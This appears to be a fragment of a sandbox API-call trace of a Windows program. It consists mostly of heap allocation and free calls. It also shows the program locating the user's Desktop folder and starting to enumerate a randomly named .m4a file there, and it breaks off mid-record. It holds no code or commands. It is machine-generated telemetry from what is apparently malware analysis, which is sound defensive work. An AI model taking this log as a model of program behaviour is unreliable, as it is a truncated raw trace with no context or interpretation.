1 [0100.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0100.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0100.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0100.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0100.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0100.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71f88 [0100.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f80 [0100.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0100.752] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a751c8 [0100.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6530 | out: hHeap=0x2af0000) returned 1 [0100.752] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0100.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0100.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0100.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0100.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0100.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f80 | out: hHeap=0x2af0000) returned 1 [0100.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0100.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0100.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71f88 [0100.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0100.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0100.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0100.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0100.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0100.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0100.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0100.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0100.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0100.753] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0100.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0100.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0100.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0100.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0100.753] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0100.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9268 [0100.753] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0100.753] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0100.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0100.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6610 [0100.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0100.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0100.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0100.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0100.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0100.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0100.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0100.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0100.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0100.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0100.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0100.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0100.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6e80 [0100.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0100.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0100.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6610 | out: hHeap=0x2af0000) returned 1 [0100.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0100.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0100.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90e8 | out: hHeap=0x2af0000) returned 1 [0100.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0100.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0100.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0100.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71e88 [0100.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0100.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0100.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0100.754] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0100.754] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ea8 [0100.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0100.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0100.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0100.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9058 [0100.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0100.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0100.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0100.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0100.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0100.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0100.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0100.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0100.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0100.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71fe8 [0100.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0100.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0100.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0100.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0100.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0100.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0100.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72028 [0100.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0100.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0100.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0100.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0100.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0100.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0100.755] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72088 [0100.755] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9610 | out: hHeap=0x2af0000) returned 1 [0100.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0100.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9610 [0100.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0100.756] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72098 [0100.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720d8 [0100.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0100.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0100.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a720e8 [0100.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0100.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0100.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0100.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0100.756] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0100.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0100.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720e8 | out: hHeap=0x2af0000) returned 1 [0100.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0100.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0100.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0100.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0100.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0100.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0100.756] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0100.756] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0100.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0100.756] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0100.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b20 [0100.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0100.756] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9448 [0100.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720d8 [0100.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0100.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0100.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a720e8 [0100.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9460 | out: hHeap=0x2af0000) returned 1 [0100.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0100.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa94d8 [0100.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9460 [0100.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9430 | out: hHeap=0x2af0000) returned 1 [0100.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0100.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9430 [0100.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0100.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0100.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0100.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0100.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0100.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0100.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9520 [0100.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9538 [0100.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b20 | out: hHeap=0x2af0000) returned 1 [0100.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0100.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0100.757] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0100.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0100.757] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0100.757] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0100.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0100.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0100.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0100.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0100.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0100.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0100.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9598 | out: hHeap=0x2af0000) returned 1 [0100.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0100.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9598 [0100.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0100.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0100.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0100.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0100.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0100.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0100.759] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0100.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0100.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa96e8 | out: hHeap=0x2af0000) returned 1 [0100.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0100.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0100.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0100.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0100.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0100.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0100.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0100.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0100.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0100.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0100.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0100.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0100.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0100.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0100.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95b0 [0100.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0100.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0100.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0100.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0100.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0100.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0100.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95e0 | out: hHeap=0x2af0000) returned 1 [0100.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0100.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0100.760] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0100.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0100.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0100.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0100.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0100.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa95e0 [0100.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0100.760] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0100.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0100.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0100.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0100.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0100.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9568 [0100.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0100.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0100.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0100.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0100.761] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0100.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0100.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72098 [0100.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0100.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0100.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0100.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9778 [0100.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0100.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0100.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0100.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0100.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0100.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0100.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9850 [0100.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9670 [0100.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0100.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9478 | out: hHeap=0x2af0000) returned 1 [0100.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9478 [0100.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0100.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0100.761] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0100.762] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0100.762] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/fqpL_g35J.m4a", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5b11b8b0, ftCreationTime.dwHighDateTime=0x1d5c84e, ftLastAccessTime.dwLowDateTime=0x62c618a0, ftLastAccessTime.dwHighDateTime=0x1d5c9b9, ftLastWriteTime.dwLowDateTime=0x62c618a0, 